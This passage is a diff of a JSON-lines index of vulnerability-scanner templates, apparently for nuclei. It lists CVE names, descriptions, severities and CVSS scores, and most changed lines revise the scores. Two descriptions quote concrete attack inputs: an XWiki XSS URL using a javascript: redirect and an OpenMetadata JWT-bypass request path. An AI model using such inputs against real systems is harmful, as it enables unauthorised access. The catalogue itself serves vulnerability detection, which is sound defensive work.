parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10818.yaml"} {"ID":"CVE-2018-10822","Info":{"Name":"D-Link Routers - Local File Inclusion","Severity":"high","Description":"D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10822.yaml"} {"ID":"CVE-2018-10823","Info":{"Name":"D-Link Routers - Remote Command Injection","Severity":"high","Description":"D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-10823.yaml"} -{"ID":"CVE-2018-10942","Info":{"Name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","Severity":"critical","Description":"In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10942.yaml"} +{"ID":"CVE-2018-10942","Info":{"Name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","Severity":"critical","Description":"In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-10942.yaml"} {"ID":"CVE-2018-10956","Info":{"Name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","Severity":"high","Description":"IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10956.yaml"} {"ID":"CVE-2018-11227","Info":{"Name":"Monstra CMS \u003c=3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-11227.yaml"} {"ID":"CVE-2018-11231","Info":{"Name":"Opencart Divido - Sql Injection","Severity":"high","Description":"OpenCart Divido plugin is susceptible to SQL injection\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2018/CVE-2018-11231.yaml"} @@ -2017,7 +2017,7 @@ {"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"} {"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"} {"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"} -{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"high","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"} +{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"critical","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"} {"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"} {"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"} {"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"} @@ -2158,7 +2158,7 @@ {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} -{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} +{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"medium","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} {"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} {"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"} @@ -2176,7 +2176,7 @@ {"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.7 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"} {"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"} {"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} -{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} +{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} {"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} {"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} {"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"} @@ -2289,14 +2289,14 @@ {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"} -{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} +{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} {"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"} {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} {"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"} {"ID":"CVE-2023-47115","Info":{"Name":"Label Studio - Cross-Site Scripting","Severity":"high","Description":"Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.\n","Classification":{"CVSSScore":"7.1"}},"file_path":"http/cves/2023/CVE-2023-47115.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} {"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"} -{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"high","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"} +{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"medium","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"} {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} @@ -2345,7 +2345,7 @@ {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"} -{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} +{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"} {"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} @@ -2395,7 +2395,7 @@ {"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"} {"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"} {"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"} -{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} +{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} @@ -2408,13 +2408,14 @@ {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} -{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} 